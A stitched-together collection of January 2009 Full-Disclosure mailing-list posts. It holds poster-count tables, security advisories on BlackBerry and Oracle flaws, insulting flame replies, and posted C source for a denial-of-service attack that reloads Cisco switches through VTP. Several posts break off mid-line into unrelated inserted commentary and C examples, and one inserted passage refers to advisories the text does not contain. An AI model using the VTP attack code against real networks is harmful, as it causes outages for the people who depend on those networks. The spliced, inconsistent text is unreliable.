| 5   | 19     | Valdis.Kletnieks_at_vt.edu         |
| 6   | 17     | Biz_Marqee                         |
| 7   | 14     | Paul_Schmehl                       |
| 8   | 11     | Mainbox_Notif                      |
| 9   | 11     | James_Matthews                     |
| 10  | 10     | Ed_Carp                            |

| Top List For: December_2008                       |
+-----+--------+------------------------------------+
| nr. | posts. | user.                              |
+-----+--------+------------------------------------+
| 1   | 78     | Ureleet                            |
| 2   | 76     | n3td3v                             |
| 3   | 26     | Valdis.Kletnieks_at_vt.edu         |
| 4   | 25     | James_Matthews                     |
| 5   | 22     | j-f_sentier                        |
| 6   | 17     | Elazar_Broad                       |
| 7   | 15     | Bipin_Gautam                       |
| 8   | 12     | zdi-disclosures_at_3com.com        |
| 9   | 12     | security_at_mandriva.com           |
| 10  | 12     | Mike_C                             |

| Top List For: November_2008                       |
+-----+--------+------------------------------------+
| nr. | posts. | user.                              |
+-----+--------+------------------------------------+
| 1   | 112    | n3td3v                             |
| 2   | 61     | Ureleet                            |
| 3   | 35     | Valdis.Kletnieks_at_vt.edu         |
| 4   | 30     | adrian.lamo_at_hushmail.com        |
| 5   | 22     | James_Matthews                     |
| 6   | 21     | Trollie_Fingers                    |
| 7   | 18     | Mike_C                             |
| 8   | 15     | vulcanius                          |
| 9   | 15     | security_at_mandriva.com           |
| 10  | 14     | Fredrick_Diggle                    |

I believe that n3td3v is trying to destroy this list so that his history here somehow magically disappears, this will not happen of course because what gets posted to the Internet stays on the Internet and is available for future employers to see for all eternity.

## In case someone else wants to use this script: ##

#!/bin/bash
LIST_SIZE=13
function _get() {
MONTH=$2.txt;
URL=$1;
wget $URL -O $MONTH 1/dev/null 2/dev/null;
#ignore if name contains quotations etc.
echo..;
echo -n | Top List For: $2
let S=37-$(echo $2 | wc -c);
for space in $(seq 0 $S); do echo -n ; done
echo|;
echo+.--.+;
echo| nr. | posts. | user. |;
echo++--++;
PRE=$(cat $MONTH | grep | sed -e 's/^...//g' -e 's/ /_/g' | sort | uniq -c | sort -rn | head -n $LIST_SIZE | sed -e 's/^[ \t]*//g' -e 's/ /y/g');
COUNT=1;
for CURRENT in $(echo $PRE); do
declare -a ITEMS=($(echo $CURRENT | sed 's/y/ /g'));
# format nr col
echo -n | $COUNT;
let S=6-$(echo $COUNT | wc -c);
for space in $(seq 0 $S); do echo -n ; done
# format posts. col.
echo -n | ${ITEMS[0]};
let S=8-$(echo ${ITEMS[0]} | wc -c);
for space in $(seq 0 $S); do echo -n ; done
echo -n |;
# format user col.
echo -n ${ITEMS[1]};
if [ $(echo ${ITEMS[1]} | wc -c) -gt 28 ]; then ITEMS[1]=$(echo ${ITEMS[1]} | sed 's/\(^.\{,28\}\).*$/\1/g'); fi
let S=28-$(echo ${ITEMS[1]} | wc -c);
for space in $(seq 0 $S); do echo -n ; done
[Full-disclosure] iDefense Security Advisory 01.13.09: RIM BlackBerry Enterprise Server Attachment Service PDF Distiller Uninitialized Memory Vulnerability
iDefense Security Advisory 01.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 12, 2009

I. BACKGROUND

The BlackBerry Enterprise Server is a suite of applications used to connect enterprise email and messaging services to BlackBerry device users. It consists of a variety of applications, one of which is the Attachment Service. This application is used to convert email attachments into a format that is easily rendered on BlackBerry devices. When a user requests an attachment on their BlackBerry device, the Attachment Service will obtain the attachment, parse and convert it, and then send it to the user for viewing. The Attachment Service is capable of converting a variety of different file formats, including PDF files. This vulnerability affects the PDF filter/distiller. For more information, see the vendor's site found at the following link.

http://na.blackberry.com/eng/services/server/

II. DESCRIPTION

Remote exploitation of an uninitialized memory vulnerability in Research In Motion Ltd.'s BlackBerry Enterprise Server could allow an attacker to execute arbitrary code with the privileges of the affected service, which is usually SYSTEM.

The vulnerability occurs when parsing a data stream inside of a PDF file. Due to a logic error, it is possible to allocate an array of object pointers that is never initialized. This array is located on the heap. When the object that contains this array is destroyed, each pointer in the array is deleted. Since the memory is never properly initialized, whatever content was previously there is used. It is possible to control the chunk of memory that gets allocated for this array, which can lead to attacker-controlled values being used as object pointers. This results in the execution of arbitrary code when these pointers are deleted.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the Attachment Service, usually SYSTEM. In order to exploit this vulnerability, an attacker must email an enterprise BlackBerry user a malicious PDF file. Then, the user must attempt to view the file on their device.

It is important to note that a user must request the attachment in order to trigger the parsing. It is not possible to exploit this vulnerability in a completely automated fashion without a user asking to view the file. However, after a user has requested the attachment, no further interaction is necessary.

Labs testing has demonstrated that this vulnerability is highly exploitable. It is possible to lay out the heap in such a way that a previously allocated chunk of fully controllable memory is reused for the uninitialized memory block. Code execution is then gained when this memory is used as an array of object pointers.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in BlackBerry Enterprise Server version 4.1.5 and 4.1.6 (4.1 SP5, SP6). 4.1.6 is the most current version, as of the publishing of this report. This vulnerability was confirmed in BlackBerry Enterprise Server for Microsoft Exchange, but is believed to affect the Lotus and Novell versions as well. Previous versions may also be affected.

V. WORKAROUND

It is possible to disable the PDF Distiller, which will prevent the conversion of PDF files by the Attachment Server. The following workaround was suggested by RIM for a previous PDF Distiller vulnerability, and has been verified to prevent the vulnerability described in this report. This workaround can be accomplished as follows:

To remove the PDF file extension from the list of supported file format extensions, complete the following actions:

1. From the Windows Desktop, open the BlackBerry Server Configuration tool.
2. Click the Attachment Server tab.
3. In the Format Extensions field, delete pdf: from the colon delimited list of extensions.
4. Click Apply.
5. Click OK.

After this, it is also necessary to completely disable the PDF distiller from loading, which will prevent an attacker from renaming a PDF to some other format extension. In order to do this, complete the following steps:

1. On the Windows Desktop, open the BlackBerry Server Configuration tool.
2. Click the Attachment Server tab.
3. In the Configuration Option drop-down list, select Attachment Server.
4. In the Distiller Settings section, next to the distiller name Adobe PDF, clear the check box in the Enabled column.
5. Click Apply.
6. Click OK.
7. On the Windows Desktop, in Administrative Tools, open Services.
8. Right-click BlackBerry Attachment Service and click Stop.
9. Right-click BlackBerry Attachment Service and click Start.
10. Close Services.

In Microsoft Exchange and Novell GroupWise environments, complete the following additional steps:

1. On the Windows Desktop, in Administrative Tools, open Services.
2. Right-click BlackBerry Dispatcher and click Stop.
3. Right-click
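The two PDF distiller advisories above describe an object-pointer array that is filled without a capacity check ('bitmaps' heap overflow) and one whose slots are deleted without ever being initialized. The added example below is not RIM's code; it is a C sketch of a container that closes both gaps, and its type names, function names and the 4096-entry limit are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PTR_ARRAY_MAX 4096  /* hypothetical upper bound on entries per stream */

struct object { int id; };

struct ptr_array {
    struct object **items;
    size_t count;     /* slots that hold a stored pointer */
    size_t capacity;  /* slots allocated */
};

/* Allocate the array. calloc() checks the count*size multiplication and
 * zero-fills, so every slot starts as NULL instead of stale heap content. */
int ptr_array_init(struct ptr_array *a, size_t capacity)
{
    a->items = NULL;
    a->count = 0;
    a->capacity = 0;
    if (capacity == 0 || capacity > PTR_ARRAY_MAX)
        return -1;
    a->items = calloc(capacity, sizeof *a->items);
    if (!a->items)
        return -1;
    a->capacity = capacity;
    return 0;
}

/* Append one pointer. The capacity check runs before every write; the array
 * grows up to PTR_ARRAY_MAX and then rejects input instead of writing past
 * the end of the allocation. */
int ptr_array_push(struct ptr_array *a, struct object *obj)
{
    if (a->count == a->capacity) {
        size_t new_cap = a->capacity * 2;
        struct object **grown;

        if (new_cap > PTR_ARRAY_MAX)
            new_cap = PTR_ARRAY_MAX;
        if (new_cap <= a->capacity)
            return -1;                      /* limit reached */
        grown = realloc(a->items, new_cap * sizeof *grown);
        if (!grown)
            return -1;
        /* realloc() leaves the new tail uninitialized: clear it as well. */
        memset(grown + a->capacity, 0,
               (new_cap - a->capacity) * sizeof *grown);
        a->items = grown;
        a->capacity = new_cap;
    }
    a->items[a->count++] = obj;
    return 0;
}

/* Destructor that walks every allocated slot, as the advisory's destructor
 * does. Unused slots are NULL and free(NULL) is a no-op, so no stale value
 * is ever treated as an object pointer. */
void ptr_array_destroy(struct ptr_array *a)
{
    size_t i;
    for (i = 0; i < a->capacity; i++)
        free(a->items[i]);
    free(a->items);
    a->items = NULL;
    a->count = a->capacity = 0;
}

/* Constructed stand-in for a parser: the stream declares `declared` objects
 * but actually carries `actual`. Returns how many were stored, or -1 when
 * the input is rejected. */
long load_objects(size_t declared, size_t actual)
{
    struct ptr_array a;
    long stored;
    size_t i;

    if (ptr_array_init(&a, declared) != 0)
        return -1;
    for (i = 0; i < actual; i++) {
        struct object *o = malloc(sizeof *o);
        if (!o || ptr_array_push(&a, o) != 0) {
            free(o);
            ptr_array_destroy(&a);
            return -1;
        }
        o->id = (int)i;
    }
    stored = (long)a.count;
    ptr_array_destroy(&a);
    return stored;
}

int main(void)
{
    printf("declared 2, actual 10   -> %ld\n", load_objects(2, 10));
    printf("declared 8, actual 0    -> %ld\n", load_objects(8, 0));
    printf("declared 16, actual 5000 -> %ld\n", load_objects(16, 5000));
    return 0;
}
```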
Re: [Full-disclosure] Full Disclosure Top List
On Tue, Jan 13, 2009 at 9:24 PM, Ureleet urel...@gmail.com wrote:
> as i said. im done posting about him, so i apologize to those ive inadvertently pissed off in the wake of flushing him down the toilet.

You *haven't* flushed me down the toilet, *you* made up lies about me on full-disclosure that *some* gullible people believed and decided to gang up on me believing all the things you were saying about me were true.

*You* have wasted a lot of people's time.
[Full-disclosure] iDefense Security Advisory 01.13.09: Oracle Database 10g R2 Summary Advisor Arbitrary File Rewrite Vulnerability
iDefense Security Advisory 01.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 12, 2009

I. BACKGROUND

Oracle Database Server is a family of database products that range from personal databases to enterprise solutions. Further information is available at the following URL:

http://www.oracle.com/database/index.html

II. DESCRIPTION

Local exploitation of an arbitrary file rewrite vulnerability in Oracle Corp.'s Oracle Database 10g Release 2 database product allows attackers to gain elevated privileges.

The vulnerability exists in a function that allows a user with an authenticated session to create any file or rewrite any files to which the database account has access.

III. ANALYSIS

Successful exploitation allows the attacker to gain database account privilege. On Linux and Unix systems the database account is usually 'oracle' while on Windows systems it is the 'SYSTEM' account. To exploit this vulnerability, the attacker must create a session and execute the privileged procedure.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Oracle Database 10g Release 2 version 10.2.0.3.0 on 32-bit Linux platform and Windows platform. Previous versions may also be affected. Oracle Database 11g Release 1 version 11.1.0.6.0 is not affected by this vulnerability.

V. WORKAROUND

iDefense is currently unaware of any workaround for this issue.

VI. VENDOR RESPONSE

Oracle has released a patch which addresses this issue. For more information, consult their advisory at the following URL.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3997 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

03/24/2008 - Initial Vendor Notification
03/25/2008 - Initial Vendor Response
11/24/2008 - Status update from Vendor
01/12/2009 - Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Code Audit Labs (http://vulnhunt.com).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
[Full-disclosure] iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration Server login.php Command Injection Vulnerability
iDefense Security Advisory 01.13.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 13, 2009

I. BACKGROUND

Oracle Corp.'s Secure Backup is a tape backup management software. For more information, please visit the following website:

http://www.oracle.com/technology/products/secure-backup/index.html

II. DESCRIPTION

Remote exploitation of two command injection vulnerabilities in the authentication component of Oracle Corp.'s Secure Backup Administration Server could allow an unauthenticated attacker to execute arbitrary commands in the context of the running server.

In both cases, the vulnerabilities exist in PHP scripts that authenticate a user attempting to use the service.

The first vulnerability is in php/login.php. By making a login request with a specially crafted cookie value, an attacker can execute arbitrary code on the server.

The second vulnerability is in php/common.php. This function is called from the login.php page. A variable is used to specify a command to be run. An attacker can supply any shell command for this variable and it will be executed in the context of the web server process.

III. ANALYSIS

Exploitation allows an attacker to execute arbitrary shell commands in the context of the web server process. Under Windows, the Administration Server runs as SYSTEM, so the injected command will be executed as SYSTEM. Under Linux it runs as an unprivileged user. No authentication is required to exploit this vulnerability.

IV. DETECTION

Oracle Corp.'s Secure Backup version 10.2.0.2 for Linux, and Secure Backup version 10.2.0.2 for Windows have been confirmed vulnerable. Other versions and other platforms may also be affected.

V. WORKAROUND

Block access to the httpd interface of vulnerable servers.

VI. VENDOR RESPONSE

Oracle has released a patch which addresses this issue. For more information, consult their advisory at the following URL.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-4006 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

07/18/2008 Initial Vendor Notification
07/30/2008 Initial Vendor Reply
11/24/2008 Additional Vendor Feedback
01/13/2009 Coordinated Public Disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.
[Full-disclosure] iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration Server login.php Command Injection Vulnerability
iDefense Security Advisory 01.13.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 13, 2009

I. BACKGROUND

Oracle Secure Backup is a network backup system for Oracle Databases. For more information, see:

http://www.oracle.com/database/secure-backup.html

II. DESCRIPTION

Remote exploitation of an input validation vulnerability in the authentication component of Oracle Corp.'s Secure Backup Administration Server could allow an unauthenticated attacker to execute arbitrary commands in the context of the running server.

The vulnerability is in a function of common.php which is called from the login.php page. The script fails to sanitize the input when verifying the user has permission to use the service.

III. ANALYSIS

Successful exploitation allows an attacker to gain complete control over an affected system. Because the Administration Server runs as an unprivileged user, commands will be executed as that user. Under the Linux (and possibly other) installations many files are installed world writable. These include the configuration file for the Apache web-server that the Administration Server is built on. This server starts as the root user and changes to a user specified by the configuration files. Since these files are writable by the user it may be possible for them to gain access to the root user account. Other configuration and executable files are also able to be changed.

IV. DETECTION

Oracle Corp.'s Secure Backup version 10.1.0.3 for Linux has been confirmed vulnerable. Other versions and other platforms may also be affected.

V. WORKAROUND

Block access to the httpd interface of vulnerable servers.

Remove write access for 'other' users to all files. The following command will recursively change the permissions to remove write permission to 'other'.

chmod -R o-w directory/

This may prevent some aspects of the system from functioning correctly.

VI. VENDOR RESPONSE

Oracle has released a patch which addresses this issue. For more information, consult their advisory at the following URL.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-5449 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

03/08/2007 Initial Vendor Notification
03/08/2007 Initial Vendor Reply
11/24/2008 Additional Vendor Feedback
01/13/2009 Coordinated Public Disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.
[Full-disclosure] DoS code for Cisco VLAN Trunking Protocol Vulnerability
/*DoS code for Cisco VLAN Trunking Protocol Vulnerability
 *
 *vulerability discription:
 *http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml
 *
 *To Known:
 * 1.the switch must in Server/Client Mode.
 * 2.the port ,attacker connected,must be in trunk Mode.
 *   Cisco Ethernet ports with no configuration are not
 *   in trunk.but trunk mode can be obtained through DTP
 *   attack by Yersinia.
 * 3.you must known the vtp domain,this can be sniffed
 * 4.some codes are from Yersinia.
 *
 *Result:
 * switch reload.
 *
 *
 *Compile:
 * gcc -o vtp `libnet-config --libs` vtp.c
 *
 *Usage:vtp -i interface -d vtp_domain
 *
 *Contact: showrun.lee[AT]gmail.com
 *http://sh0wrun.blogspot.com/
 */
#include <libnet.h>
#include <stdio.h>
#include <stdlib.h>

#define VTP_DOMAIN_SIZE    32
#define VTP_TIMESTAMP_SIZE 12

struct vtp_summary {
    u_int8_t  version;
    u_int8_t  code;
    u_int8_t  followers;
    u_int8_t  dom_len;
    u_int8_t  domain[VTP_DOMAIN_SIZE];
    u_int32_t revision;
    u_int32_t updater;
    u_int8_t  timestamp[VTP_TIMESTAMP_SIZE];
    u_int8_t  md5[16];
};

struct vtp_subset {
    u_int8_t  version;
    u_int8_t  code;
    u_int8_t  seq;
    u_int8_t  dom_len;
    u_int8_t  domain[VTP_DOMAIN_SIZE];
    u_int32_t revision;
};

void usage( char *s) {
    printf("%s -i interface -d vtp domain\n",s);
    exit (1);
}

int main( int argc, char *argv[] )
{
    int opt,k=0;
    extern char *optarg;
    libnet_ptag_t t;
    libnet_t *lhandler;
    u_int32_t vtp_len=0, sent;
    struct vtp_summary *vtp_summ;
    struct vtp_subset *vtp_sub;
    u_int8_t *vtp_packet,*vtp_packet2, *aux;
    u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
    u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };
    u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00,0x00,0x00 };
    struct libnet_ether_addr *mymac;
    char *device;
    char error_information[LIBNET_ERRBUF_SIZE];
    char *domain;

    // get options
    while ((opt = getopt(argc, argv, "i:d:")) != -1)
    {
        switch (opt) {
        case 'i':
            device=malloc(strlen(optarg));
            strcpy(device,optarg);
            k=1;
            break;
        case 'd':
            domain=malloc(strlen(optarg));
            strcpy(domain,optarg);
            break;
        default:
            usage(argv[0]);
        }
    }
    if(!k) {
        printf("%s -i interface -d vtp domain\n must assign the interface\n",argv[0]);
        exit(1);
    }

    //init libnet
    lhandler=libnet_init(LIBNET_LINK,device,error_information);
    if (!lhandler) {
        fprintf(stderr, "libnet_init: %s\n", error_information);
        return -1;
    }
    mymac=libnet_get_hwaddr(lhandler);

    //build the first packet for vtp_summary
    vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
    vtp_packet = calloc(1,vtp_len);
    aux = vtp_packet;
    memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
    aux+=sizeof(cisco_data);
    vtp_summ = (struct vtp_summary *)aux;
    vtp_summ->version = 0x01;
    vtp_summ->code = 0x01;//vtp_summary
    vtp_summ->followers = 0x01;
    vtp_summ->dom_len = strlen(domain);
    memcpy(vtp_summ->domain,domain,strlen(domain));
    vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok

    t = libnet_build_802_2(
        0xaa,                       /* DSAP */
        0xaa,                       /* SSAP */
        0x03,                       /* control */
        vtp_packet,                 /* payload */
        vtp_len,                    /* payload size */
        lhandler,                   /* libnet handle */
        0);                         /* libnet id */
    t = libnet_build_802_3(
        dst_mac,                    /* ethernet destination */
        mymac->ether_addr_octet,    /* ethernet source */
        LIBNET_802_2_H + vtp_len,   /* frame size */
        NULL,                       /* payload */
        0,                          /* payload size */
        lhandler,                   /* libnet handle */
        0);                         /* libnet id */

    sent = libnet_write(lhandler);
    if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        return -1;
    }
    libnet_clear_packet(lhandler);

    //build the second vtp packet for vtp_subset
    vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);
    vtp_packet2 = calloc(1,vtp_len);
    aux = vtp_packet2;
    memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));
    aux+=sizeof(cisco_data);
    vtp_sub = (struct vtp_subset *)aux;
    vtp_sub->version = 0x01;
    vtp_sub->code = 0x02; //vtp_subset
    vtp_sub->seq = 0x01;
    vtp_sub->dom_len = strlen(domain);
    memcpy(vtp_sub->domain,domain,strlen(domain));
    vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok
    // memcpy(vtp_sub->aaa,aaa,strlen(aaa));

    t = libnet_build_802_2(
        0xaa,                       /* DSAP */
        0xaa,                       /* SSAP */
        0x03,                       /* control */
        vtp_packet2,                /* payload */
        vtp_len,                    /* payload size */
        lhandler,                   /* libnet handle */
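For detection, the frames built by the posted code can be recognised from the constants it uses: the destination MAC, the LLC/SNAP header, the VTP code and the revision field. The C parser below is an added example, not part of the original post; the allow-list of switch MACs, the baseline revision and the `max_step` threshold are assumptions, and the sample frame is constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define VTP_DOMAIN_SIZE 32
#define VTP_MIN_FRAME   62   /* 14 Ethernet + 8 LLC/SNAP + 40 VTP header */

enum vtp_verdict {
    VTP_NOT_VTP,          /* some other protocol */
    VTP_MALFORMED,        /* VTP framing, but truncated or bad dom_len */
    VTP_OTHER,            /* VTP message other than code 1 or 2 */
    VTP_OK,               /* advert from a known switch, plausible revision */
    VTP_UNTRUSTED_SOURCE, /* advert from a MAC that is not a known switch */
    VTP_REVISION_JUMP     /* revision far above the tracked baseline */
};

struct vtp_info {
    uint8_t  src_mac[6];
    uint8_t  version, code, dom_len;
    char     domain[VTP_DOMAIN_SIZE + 1];
    uint32_t revision;
};

/* Constructed allow-list: MACs of the switches permitted to send VTP. */
static const uint8_t TRUSTED[][6] = {
    { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55 }
};

/* Constructed sample: summary advert, domain "LAB", revision 2000,
 * sent from a MAC that is not on the allow-list. */
static const uint8_t SAMPLE_FRAME[VTP_MIN_FRAME] = {
    0x01, 0x00, 0x0c, 0xcc, 0xcc, 0xcc,   /* destination MAC */
    0x02, 0x00, 0x00, 0x00, 0x00, 0x99,   /* source MAC */
    0x00, 0x30,                           /* 802.3 length (48) */
    0xaa, 0xaa, 0x03,                     /* LLC: DSAP, SSAP, control */
    0x00, 0x00, 0x0c, 0x20, 0x03,         /* SNAP: OUI + protocol id */
    0x01, 0x01, 0x01, 0x03,               /* version, code, followers, dom_len */
    'L', 'A', 'B',                        /* domain, zero-padded to 32 bytes */
    [58] = 0x00, 0x00, 0x07, 0xd0         /* revision, big-endian */
};

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Classify one captured 802.3 frame. baseline_rev is the revision the
 * monitor last saw from a trusted switch; max_step is the largest
 * increase it tolerates between two observations. */
enum vtp_verdict vtp_inspect(const uint8_t *f, size_t len,
                             const uint8_t (*trusted)[6], size_t ntrusted,
                             uint32_t baseline_rev, uint32_t max_step,
                             struct vtp_info *out)
{
    static const uint8_t dst[6] = { 0x01, 0x00, 0x0c, 0xcc, 0xcc, 0xcc };
    static const uint8_t llc_snap[8] =
        { 0xaa, 0xaa, 0x03, 0x00, 0x00, 0x0c, 0x20, 0x03 };
    size_t i;

    memset(out, 0, sizeof *out);
    if (len < 22 || memcmp(f, dst, 6) != 0 || memcmp(f + 14, llc_snap, 8) != 0)
        return VTP_NOT_VTP;
    /* Length is checked first, so f[25] is only read when it exists. */
    if (len < VTP_MIN_FRAME || f[25] > VTP_DOMAIN_SIZE)
        return VTP_MALFORMED;

    memcpy(out->src_mac, f + 6, 6);
    out->version = f[22];
    out->code    = f[23];
    out->dom_len = f[25];
    memcpy(out->domain, f + 26, out->dom_len);  /* NUL comes from memset */
    out->revision = be32(f + 58);

    /* Only summary (1) and subset (2) adverts carry the revision here. */
    if (out->code != 0x01 && out->code != 0x02)
        return VTP_OTHER;
    for (i = 0; i < ntrusted; i++)
        if (memcmp(out->src_mac, trusted[i], 6) == 0)
            break;
    if (i == ntrusted)
        return VTP_UNTRUSTED_SOURCE;
    if (out->revision > baseline_rev && out->revision - baseline_rev > max_step)
        return VTP_REVISION_JUMP;
    return VTP_OK;
}

int main(void)
{
    struct vtp_info info;
    enum vtp_verdict v = vtp_inspect(SAMPLE_FRAME, sizeof SAMPLE_FRAME,
                                     TRUSTED, 1, 12, 50, &info);
    printf("domain=%s revision=%u verdict=%d\n",
           info.domain, (unsigned)info.revision, (int)v);
    return 0;
}
```

A monitor would feed this from a capture on access ports, where VTP adverts from end hosts are not expected at all.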
[Full-disclosure] Trigger Abuse of MDSYS.SDO_TOPO_DROP_FTBL in Oracle 10g R1 and R2
NGSSoftware Insight Security Research Advisory

Name: Trigger abuse of MDSYS.SDO_TOPO_DROP_FTBL
Systems Affected: Oracle 10g R1 and R2 (10.1.0.5 and 10.2.0.2)
Severity: High
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ dav...@ngssoftware.com ]
Reported: 23rd July 2008
Date of Public Advisory: 13th January 2009
Advisory number: #NISR13012009
CVE: CVE-2008-3979

Overview

Oracle has just released a fix for a flaw that, when exploited, allows a low privileged authenticated database user to gain MDSYS privileges. This can be abused by an attacker to perform actions as the MDSYS user.

Details

MDSYS.SDO_TOPO_DROP_FTBL is one of the triggers that forms part of the Oracle Spatial Application. It is vulnerable to SQL injection. When a user drops a table the trigger fires. The name of the table is embedded in a dynamic SQL query which is then executed by the trigger. Note that the Oracle advisory states that the attacker requires the DROP TABLE and CREATE PROCEDURE privileges. This is not the case and only CREATE SESSION privileges are required.

Fix Information

Oracle was alerted to this flaw on the 23rd July 2008. A patch has now been made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner designed specifically for Oracle, can be used to accurately determine whether your servers are vulnerable to these flaws. More information about NGSSQuirreL for Oracle can be found here:

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oraclephp

About NGSSoftware

NGSSoftware, an NCC Group Company, develops vulnerability assessment and compliancy tools for database servers including Oracle, Microsoft SQL Server, DB2, Sybase and Informix. Headquartered in the United Kingdom NGS has offices in London, St. Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United States; NGS provide services to some of the largest and most demanding organizations around the globe.

http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076
Re: [Full-disclosure] Simple request
the fuck have you done juan? your more worthless than ureleet

3 2 n3td3v

On Tue, 13 Jan 2009 05:24:29 -0800 Juha-Matti Laurio juha-matti.lau...@netti.fi wrote:

FYI: Since 1st Jan there are 527 messages posted to FD. The overall amount of Dec' 08 was 637 messages and we haven't passed the mid-January yet.

Some numbers of 2008:
Oct '08: 531
Mar '08: 600
Jan '08: 615

Hey how many of the recent messages use bandwidth, disk space, your time etc. without disclosing anything...

Juha-Matti
Re: [Full-disclosure] Trigger Abuse of MDSYS.SDO_TOPO_DROP_FTBL in Oracle 10g R1 and R2
afaik, no one cares about oracle. retarded blind scavengers make careers selling fallen, rotten, previously low hanging fruit.

3 2 n3td3v

Tue, 13 Jan 2009 15:52:02 -0800 David Litchfield dav...@ngssoftware.com wrote:

NGSSoftware Insight Security Research Advisory

Name: Trigger abuse of MDSYS.SDO_TOPO_DROP_FTBL
Systems Affected: Oracle 10g R1 and R2 (10.1.0.5 and 10.2.0.2)
Severity: High
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ dav...@ngssoftware.com ]
Reported: 23rd July 2008
Date of Public Advisory: 13th January 2009
Advisory number: #NISR13012009
CVE: CVE-2008-3979

Overview

Oracle has just released a fix for a flaw that, when exploited, allows a low privileged authenticated database user to gain MDSYS privileges. This can be abused by an attacker to perform actions as the MDSYS user.

Details

MDSYS.SDO_TOPO_DROP_FTBL is one of the triggers that forms part of the Oracle Spatial Application. It is vulnerable to SQL injection. When a user drops a table the trigger fires. The name of the table is embedded in a dynamic SQL query which is then executed by the trigger. Note that the Oracle advisory states that the attacker requires the DROP TABLE and CREATE PROCEDURE privileges. This is not the case and only CREATE SESSION privileges are required.

Fix Information

Oracle was alerted to this flaw on the 23rd July 2008. A patch has now been made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner designed specifically for Oracle, can be used to accurately determine whether your servers are vulnerable to these flaws. More information about NGSSQuirreL for Oracle can be found here:

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oraclephp

About NGSSoftware

NGSSoftware, an NCC Group Company, develops vulnerability assessment and compliancy tools for database servers including Oracle, Microsoft SQL Server, DB2, Sybase and Informix. Headquartered in the United Kingdom NGS has offices in London, St. Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United States; NGS provide services to some of the largest and most demanding organizations around the globe.

http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076
Re: [Full-disclosure] Trigger Abuse of MDSYS.SDO_TOPO_DROP_FTBL in Oracle 10g R1 and R2
stfu .

2009/1/13 sexyazngr...@mac.hush.com

afaik, no one cares about oracle. retarded blind scavengers make careers selling fallen, rotten, previously low hanging fruit.

3 2 n3td3v

Tue, 13 Jan 2009 15:52:02 -0800 David Litchfield dav...@ngssoftware.com wrote:

NGSSoftware Insight Security Research Advisory

Name: Trigger abuse of MDSYS.SDO_TOPO_DROP_FTBL
Systems Affected: Oracle 10g R1 and R2 (10.1.0.5 and 10.2.0.2)
Severity: High
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ dav...@ngssoftware.com ]
Reported: 23rd July 2008
Date of Public Advisory: 13th January 2009
Advisory number: #NISR13012009
CVE: CVE-2008-3979

Overview

